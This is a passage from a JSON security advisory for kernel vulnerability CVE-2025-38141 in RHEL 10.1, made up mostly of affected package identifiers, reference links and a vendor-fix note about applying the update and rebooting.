"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-38141"
},
{
"category": "external",
"summary": "RHBZ#2376052",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376052"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-38141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38141"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38141",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38141"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025070333-CVE-2025-38141-560e@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025070333-CVE-2025-38141-560e@gregkh/T"
}
],
"release_date": "2025-07-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
